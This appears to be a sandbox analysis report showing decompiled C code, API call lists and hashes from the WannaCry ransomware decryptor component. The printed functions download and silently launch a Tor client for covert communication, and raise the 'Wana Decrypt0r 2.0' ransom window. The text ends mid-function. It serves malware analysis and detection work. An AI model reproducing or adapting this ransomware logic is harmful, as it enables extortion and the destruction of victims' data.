                                                      				asm("stosb");
                                                      				sprintf( &_v1040, "%s\\%s\\%s", "TaskData", "Tor", "taskhsvc.exe");
                                                      				_t84 =  &_v1124 + 0x20;
                                                      				_t33 = GetFileAttributesA( &_v1040); // executed
                                                      				if(_t33 != 0xffffffff) {
                                                      					L8:
                                                      					_v1108.cb = 0x44;
                                                      					_v1124.hProcess = 0;
                                                      					memset( &(_v1108.lpReserved), 0, 0x10 << 2);
                                                      					_v1124.hThread = 0;
                                                      					_v1124.dwProcessId = 0;
                                                      					_v1124.dwThreadId = 0;
                                                      					_v1108.wShowWindow = 0;
                                                      					_v1108.dwFlags = 1;
                                                      					_t37 = CreateProcessA(0,  &_v1040, 0, 0, 0, 0x8000000, 0, 0,  &_v1108,  &_v1124); // executed
                                                      					if(_t37 != 0) {
                                                      						if(WaitForSingleObject(_v1124.hProcess, 0x1388) == 0x102) {
                                                      							WaitForSingleObject(_v1124.hProcess, 0x7530);
                                                      						}
                                                      						CloseHandle(_v1124);
                                                      						CloseHandle(_v1124.hThread);
                                                      						return 1;
                                                      					} else {
                                                      						return 0;
                                                      					}
                                                      				} else {
                                                      					_t46 = E0040B6A0("TaskData", "s.wnry", 0);
                                                      					_t86 = _t84 + 0xc;
                                                      					if(_t46 != 0) {
                                                      						L5:
                                                      						_t47 =  *0x421798; // 0x0
                                                      						_v520 = _t47;
                                                      						memset( &_v519, 0, 0x81 << 2);
                                                      						asm("stosw");
                                                      						asm("stosb");
                                                      						sprintf( &_v520, "%s\\%s\\%s", "TaskData", "Tor", "tor.exe");
                                                      						_t84 = _t86 + 0x20;
                                                      						_t51 = GetFileAttributesA( &_v520); // executed
                                                      						if(_t51 != 0xffffffff) {
                                                      							CopyFileA( &_v520,  &_v1040, 0); // executed
                                                      							goto L8;
                                                      						} else {
                                                      							return 0;
                                                      						}
                                                      					} else {
                                                      						_push(0);
                                                      						_t55 = E0040B780( &_v1040, "TaskData", "https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip");
                                                      						_t86 = _t86 + 0xc;
                                                      						if(_t55 != 0) {
                                                      							goto L5;
                                                      						} else {
                                                      							_push(0);
                                                      							_t56 = E0040B780( &_v1040, "TaskData", 0x4221ac);
                                                      							_t86 = _t86 + 0xc;
                                                      							if(_t56 != 0) {
                                                      								goto L5;
                                                      							} else {
                                                      								return _t56;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}




















                                                      APIs
                                                      • sprintf.MSVCRT ref: 0040B87A
                                                      • GetFileAttributesA.KERNELBASE(?,?,?,?,00000000,?), ref: 0040B88D
                                                      • CreateProcessA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9AA
                                                        • Part of subcall function 0040B6A0: CreateDirectoryA.KERNELBASE(?,00000000,?,76E83310,00000000,00000428), ref: 0040B6B4
                                                        • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      • sprintf.MSVCRT ref: 0040B924
                                                      • GetFileAttributesA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
                                                        • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000428), ref: 0040B793
                                                        • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                                        • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                                        • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                                        • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
                                                      • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
                                                      • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9CF
                                                      • WaitForSingleObject.KERNEL32(?,00007530,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9E2
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9EF
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9F6
                                                        • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete$Create$AttributesCloseDirectoryHandleObjectSingleWaitsprintf$CacheCopyDownloadEntryNameProcessTemp
                                                      • String ID: %s\%s\%s$D$TaskData$Tor$https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry$taskhsvc.exe$tor.exe
                                                      • API String ID: 4284242699-3937372533
                                                      • Opcode ID: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                                      • Instruction ID: 35d80fb58dc1195f77b7b167f0129d00e9adf464e01d9889cd120ecf7352bd78
                                                      • Opcode Fuzzy Hash: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                                      • Instruction Fuzzy Hash: 0C4137716443007AD710DBA4EC41BEBB7D4AFE8700F90883FF698532E1D6B99548879E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 94%
                                                      			E00405A60(void* __ecx) {
                                                      				char _v8;
                                                      				intOrPtr _v16;
                                                      				char _v24;
                                                      				char _v32;
                                                      				char _v40;
                                                      				char _v48;
                                                      				char _v56;
                                                      				char _v64;
                                                      				char _v72;
                                                      				char _v80;
                                                      				char _v88;
                                                      				char _v96;
                                                      				char _v104;
                                                      				char _v112;
                                                      				char _v120;
                                                      				void* _v140;
                                                      				void* _v928;
                                                      				void* _v932;
                                                      				void* _v936;
                                                      				void* _v1000;
                                                      				char _v1124;
                                                      				char _v1248;
                                                      				char _v1352;
                                                      				char _v1456;
                                                      				char _v1560;
                                                      				char _v1664;
                                                      				char _v1796;
                                                      				char _v1928;
                                                      				void* _v1992;
                                                      				void* _v2056;
                                                      				void* _v2120;
                                                      				char _v2212;
                                                      				char _v2216;
                                                      				intOrPtr _t144;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413A76);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t144;
                                                      				E0040B620(L"Wana Decrypt0r 2.0", 1);
                                                      				_push(0);
                                                      				L00412F08();
                                                      				L00412F02();
                                                      				L00412EFC();
                                                      				E004060E0( &_v2212, 0);
                                                      				_v8 = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x20)) =  &_v2216;
                                                      				L00412B72(); // executed
                                                      				_v8 = 0x1d;
                                                      				_v24 = 0x415a30;
                                                      				E00403F20( &_v24);
                                                      				_v8 = 0x1c;
                                                      				_v32 = 0x415a30;
                                                      				E00403F20( &_v32);
                                                      				_v8 = 0x1b;
                                                      				_v40 = 0x415a30;
                                                      				E00403F20( &_v40);
                                                      				_v8 = 0x1a;
                                                      				_v48 = 0x415a44;
                                                      				E00403F20( &_v48);
                                                      				_v8 = 0x19;
                                                      				_v56 = 0x415a44;
                                                      				E00403F20( &_v56);
                                                      				_v8 = 0x18;
                                                      				_v64 = 0x415a44;
                                                      				E00403F20( &_v64);
                                                      				_v8 = 0x17;
                                                      				_v72 = 0x415a44;
                                                      				E00403F20( &_v72);
                                                      				_v8 = 0x16;
                                                      				_v80 = 0x415a44;
                                                      				E00403F20( &_v80);
                                                      				_v8 = 0x15;
                                                      				_v88 = 0x415a44;
                                                      				E00403F20( &_v88);
                                                      				_v8 = 0x14;
                                                      				_v96 = 0x415a44;
                                                      				E00403F20( &_v96);
                                                      				_v8 = 0x13;
                                                      				_v104 = 0x415a44;
                                                      				E00403F20( &_v104);
                                                      				_v8 = 0x12;
                                                      				E00403F90( &_v112);
                                                      				_v8 = 0x11;
                                                      				E00403F90( &_v120);
                                                      				_v8 = 0x10;
                                                      				L00412CC2();
                                                      				_v8 = 0xf;
                                                      				L00412CC2();
                                                      				_v8 = 0xe;
                                                      				L00412CC2();
                                                      				_v8 = 0xd;
                                                      				L00412CC2();
                                                      				_v8 = 0xc;
                                                      				L00412EF6();
                                                      				_v8 = 0xb;
                                                      				E004050A0( &_v1124);
                                                      				_v8 = 0xa;
                                                      				E004050A0( &_v1248);
                                                      				_v8 = 9;
                                                      				E00404170( &_v1352);
                                                      				_v8 = 8;
                                                      				E00404170( &_v1456);
                                                      				_v8 = 7;
                                                      				E00404170( &_v1560);
                                                      				_v8 = 6;
                                                      				E00404170( &_v1664);
                                                      				_v8 = 5;
                                                      				E00405D90( &_v1796);
                                                      				_v8 = 4;
                                                      				E00405D90( &_v1928);
                                                      				_v8 = 3;
                                                      				L00412EF0();
                                                      				_v8 = 2;
                                                      				L00412EF0();
                                                      				_v8 = 1;
                                                      				L00412D4C();
                                                      				_v8 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v16;
                                                      				return 0;
                                                      			}

                                                      APIs
                                                        • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                                        • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                                        • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                                        • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                                        • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
                                                        • Part of subcall function 0040B620: SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                                        • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                                        • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
                                                        • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
                                                      • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
                                                      • #2621.MFC42 ref: 00405A96
                                                      • #6438.MFC42 ref: 00405A9B
                                                        • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
                                                      • #2514.MFC42 ref: 00405AC1
                                                        • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                                        • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
                                                      • #800.MFC42 ref: 00405C33
                                                      • #800.MFC42 ref: 00405C47
                                                      • #800.MFC42 ref: 00405C5B
                                                      • #800.MFC42 ref: 00405C6F
                                                      • #781.MFC42 ref: 00405C83
                                                        • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                                        • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                                        • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                        • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                        • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                                        • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                                      • #609.MFC42 ref: 00405D37
                                                      • #609.MFC42 ref: 00405D4B
                                                      • #616.MFC42 ref: 00405D5C
                                                      • #641.MFC42 ref: 00405D70
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800Window$#540#567$#2414$#609#795$#1134#2514#2621#324#616#641#6438#654#765#781ActiveBringExitFindFocusForegroundProcessShow
                                                      • String ID: 0ZA$DZA$Wana Decrypt0r 2.0
                                                      • API String ID: 3942368781-2594244635
                                                      • Opcode ID: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                                      • Instruction ID: 9717df00861f10ea142a6202e5f0f29f583150bd1f0a7909c2c79a4805d5fd97
                                                      • Opcode Fuzzy Hash: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                                      • Instruction Fuzzy Hash: 3871B7345097C18EE735EB25C2557DFBBE4BFA6308F48981E94C916682DFB81108CBA7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 178 407a90-407ab7 179 407bf4-407c28 #2385 178->179 180 407abd-407ac5 178->180 181 407ac7 180->181 182 407aca-407ad1 180->182 181->182 182->179 183 407ad7-407af9 call 404c40 #2514 182->183 186 407b72-407bef #2414 * 2 #800 #641 183->186 187 407afb-407b6d #537 #941 #939 #6876 * 2 #535 call 4082c0 #800 183->187 186->179 187->186
                                                      C-Code - Quality: 68%
                                                      			E00407A90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				char _v4;
                                                      				char _v8;
                                                      				char _v20;
                                                      				intOrPtr _v24;
                                                      				char _v32;
                                                      				void* _v36;
                                                      				char _v44;
                                                      				char _v132;
                                                      				char* _v136;
                                                      				void* _v140;
                                                      				void* _v144;
                                                      				void* _v148;
                                                      				void* _v152;
                                                      				char _v160;
                                                      				intOrPtr _v164;
                                                      				char _v168;
                                                      				void* _v180;
                                                      				intOrPtr _t42;
                                                      				intOrPtr _t43;
                                                      				void* _t44;
                                                      				void* _t70;
                                                      				intOrPtr _t72;
                                                      				intOrPtr _t73;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413F17);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t72;
                                                      				_t73 = _t72 - 0x80;
                                                      				_t70 = __ecx;
                                                      				if(_a4 == 0x1388) {
                                                      					_t43 = __ecx + 0x2f8;
                                                      					if(_t43 != 0) {
                                                      						_t43 =  *((intOrPtr*)(_t43 + 0x20));
                                                      					}
                                                      					if(_a8 == _t43) {
                                                      						_t44 = E00404C40( &_v132, 0);
                                                      						_v8 = 0;
                                                      						L00412B72();
                                                      						if(_t44 == 1) {
                                                      							_push("***");
                                                      							L00412CAA();
                                                      							_push("\t");
                                                      							_v8 = 1;
                                                      							L00412F68();
                                                      							_push( &_v44);
                                                      							L00412F62();
                                                      							_push(0x3b);
                                                      							_push(0xa);
                                                      							L00412F5C();
                                                      							_push(0x3b);
                                                      							_push(0xd);
                                                      							L00412F5C();
                                                      							_push(1);
                                                      							_v164 = _t73;
                                                      							L00412F56();
                                                      							E004082C0(_t70,  &_v168,  &_v160);
                                                      							_v44 = 0;
                                                      							L00412CC2();
                                                      						}
                                                      						_v4 = 2;
                                                      						_v20 = 0x415c00;
                                                      						_v136 =  &_v20;
                                                      						_v4 = 5;
                                                      						L00412D52();
                                                      						_v20 = 0x415bec;
                                                      						_v136 =  &_v32;
                                                      						_v32 = 0x415c00;
                                                      						_v4 = 6;
                                                      						L00412D52();
                                                      						_v32 = 0x415bec;
                                                      						_v4 = 2;
                                                      						L00412CC2();
                                                      						_v4 = 0xffffffff;
                                                      						L00412C86();
                                                      					}
                                                      				}
                                                      				_t42 = _a8;
                                                      				_push(_a12);
                                                      				_push(_t42);
                                                      				_push(_a4);
                                                      				L00412BAE(); // executed
                                                      				 *[fs:0x0] = _v24;
                                                      				return _t42;
                                                      			}



























                                                      APIs
                                                      • #2514.MFC42 ref: 00407AF1
                                                      • #537.MFC42(***), ref: 00407B04
                                                      • #941.MFC42(00421234,***), ref: 00407B1A
                                                      • #939.MFC42(?,00421234,***), ref: 00407B28
                                                      • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
                                                      • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
                                                      • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
                                                      • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
                                                      • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
                                                      • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
                                                      • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
                                                      • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
                                                      • #2385.MFC42(?,?,?), ref: 00407C0E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#6876#800$#2385#2514#535#537#641#939#941
                                                      • String ID: ***$[A$[A
                                                      • API String ID: 3659526348-3419262722
                                                      • Opcode ID: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                                      • Instruction ID: 6b54b999ec918a2e7db5809f8de8f0b59fd624410e6f3b71b4409e3b9ece79cc
                                                      • Opcode Fuzzy Hash: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                                      • Instruction Fuzzy Hash: D5416A3410C781DAD324DB21C541BEFB7E4BB94704F408A1EB5A9832D1DBB89549CF67
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 223 4063a0-4064b5 #2302 * 12 #2370 * 3
                                                      APIs
                                                      • #2302.MFC42(?,0000040F,?), ref: 004063B2
                                                      • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
                                                      • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
                                                      • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
                                                      • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
                                                      • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
                                                      • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
                                                      • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
                                                      • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
                                                      • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
                                                      • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
                                                      • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
                                                      • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
                                                      • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
                                                      • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2302$#2370
                                                      • String ID:
                                                      • API String ID: 1711274145-0
                                                      • Opcode ID: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                                      • Instruction ID: 0d28d22553b71fc94a0ee6c66579bb390b9294cd647fac9b7e1ecc0347327b15
                                                      • Opcode Fuzzy Hash: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                                      • Instruction Fuzzy Hash: 32218E711806017FE22AE365CD82FFFA26CEF85B04F00452EB369951C1BBE8365B5665
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 319 412360-412376
                                                      C-Code - Quality: 95%
                                                      			E00412360(signed int __ecx, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				void* _v0;
                                                      				char _v260;
                                                      				struct _FILETIME _v268;
                                                      				struct _FILETIME _v276;
                                                      				struct _FILETIME _v284;
                                                      				void* _v292;
                                                      				void* _v296;
                                                      				signed int _v304;
                                                      				char _v560;
                                                      				struct _OVERLAPPED* _v820;
                                                      				void* _v824;
                                                      				void* _v827;
                                                      				void* _v828;
                                                      				long _v829;
                                                      				void* _v836;
                                                      				intOrPtr _t68;
                                                      				long _t77;
                                                      				void* _t81;
                                                      				void* _t82;
                                                      				void* _t90;
                                                      				void* _t91;
                                                      				long _t94;
                                                      				signed int _t97;
                                                      				long _t99;
                                                      				void* _t104;
                                                      				void* _t106;
                                                      				int _t116;
                                                      				long _t121;
                                                      				signed int _t132;
                                                      				signed int _t138;
                                                      				unsigned int _t140;
                                                      				signed int _t141;
                                                      				void* _t154;
                                                      				intOrPtr* _t157;
                                                      				intOrPtr _t166;
                                                      				void* _t174;
                                                      				signed int _t175;
                                                      				signed int _t176;
                                                      				long _t177;
                                                      				signed int _t178;
                                                      				signed int _t179;
                                                      				intOrPtr* _t180;
                                                      				void* _t182;
                                                      				long _t183;
                                                      				intOrPtr* _t185;
                                                      				void* _t187;
                                                      				void* _t191;
                                                      				void* _t192;
                                                      
                                                      				_t166 = _a16;
                                                      				_t132 = __ecx;
                                                      				if(_t166 == 3) {
                                                      					_t68 =  *((intOrPtr*)(__ecx + 4));
                                                      					_t176 = _a4;
                                                      					__eflags = _t176 - _t68;
                                                      					if(_t176 == _t68) {
                                                      						L14:
                                                      						_t177 = E00411810( *_t132, _a8, _a12,  &_v829);
                                                      						__eflags = _t177;
                                                      						if(_t177 <= 0) {
                                                      							E00411AC0( *_t132);
                                                      							 *(_t132 + 4) = 0xffffffff;
                                                      						}
                                                      						__eflags = _v829;
                                                      						if(_v829 == 0) {
                                                      							__eflags = _t177;
                                                      							if(_t177 <= 0) {
                                                      								asm("sbb eax, eax");
                                                      								_t77 = 0x1000 + ( ~(_t177 - 0xffffff96) & 0x04fff000);
                                                      								__eflags = _t77;
                                                      								return _t77;
                                                      							} else {
                                                      								return 0x600;
                                                      							}
                                                      						} else {
                                                      							__eflags = 0;
                                                      							return 0;
                                                      						}
                                                      					} else {
                                                      						__eflags = _t68 - 0xffffffff;
                                                      						if(_t68 != 0xffffffff) {
                                                      							E00411AC0( *((intOrPtr*)(__ecx)));
                                                      							_t187 = _t187 + 4;
                                                      						}
                                                      						_t81 =  *_t132;
                                                      						 *(_t132 + 4) = 0xffffffff;
                                                      						__eflags = _t176 -  *((intOrPtr*)(_t81 + 4));
                                                      						if(_t176 <  *((intOrPtr*)(_t81 + 4))) {
                                                      							__eflags = _t176 -  *((intOrPtr*)(_t81 + 0x10));
                                                      							if(_t176 <  *((intOrPtr*)(_t81 + 0x10))) {
                                                      								E00411390(_t81);
                                                      								_t187 = _t187 + 4;
                                                      							}
                                                      							_t82 =  *_t132;
                                                      							__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
                                                      							while( *((intOrPtr*)(_t82 + 0x10)) < _t176) {
                                                      								E004113E0(_t82);
                                                      								_t82 =  *_t132;
                                                      								_t187 = _t187 + 4;
                                                      								__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
                                                      							}
                                                      							_push( *((intOrPtr*)(_t132 + 0x138)));
                                                      							_push( *_t132);
                                                      							E00411660();
                                                      							_t187 = _t187 + 8;
                                                      							 *(_t132 + 4) = _t176;
                                                      							goto L14;
                                                      						} else {
                                                      							return 0x10000;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					if(_t166 == 2 || _t166 == 1) {
                                                      						_t178 = _t175 | 0xffffffff;
                                                      						__eflags =  *(_t132 + 4) - _t178;
                                                      						if( *(_t132 + 4) != _t178) {
                                                      							E00411AC0( *_t132);
                                                      							_t187 = _t187 + 4;
                                                      						}
                                                      						_t90 =  *_t132;
                                                      						 *(_t132 + 4) = _t178;
                                                      						_t179 = _a4;
                                                      						__eflags = _t179 -  *((intOrPtr*)(_t90 + 4));
                                                      						if(_t179 <  *((intOrPtr*)(_t90 + 4))) {
                                                      							__eflags = _t179 -  *((intOrPtr*)(_t90 + 0x10));
                                                      							if(_t179 <  *((intOrPtr*)(_t90 + 0x10))) {
                                                      								E00411390(_t90);
                                                      								_t187 = _t187 + 4;
                                                      							}
                                                      							_t91 =  *_t132;
                                                      							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
                                                      							while( *((intOrPtr*)(_t91 + 0x10)) < _t179) {
                                                      								E004113E0(_t91);
                                                      								_t91 =  *_t132;
                                                      								_t187 = _t187 + 4;
                                                      								__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
                                                      							}
                                                      							_t138 = _t132;
                                                      							E00411CF0(_t138, _t179,  &_v560);
                                                      							__eflags = _v304 & 0x00000010;
                                                      							if((_v304 & 0x00000010) == 0) {
                                                      								__eflags = _t166 - 1;
                                                      								if(_t166 != 1) {
                                                      									_t157 = _a8;
                                                      									_t185 = _t157;
                                                      									_t180 = _t157;
                                                      									_t94 =  *_t157;
                                                      									__eflags = _t94;
                                                      									while(_t94 != 0) {
                                                      										__eflags = _t94 - 0x2f;
                                                      										if(_t94 == 0x2f) {
                                                      											L43:
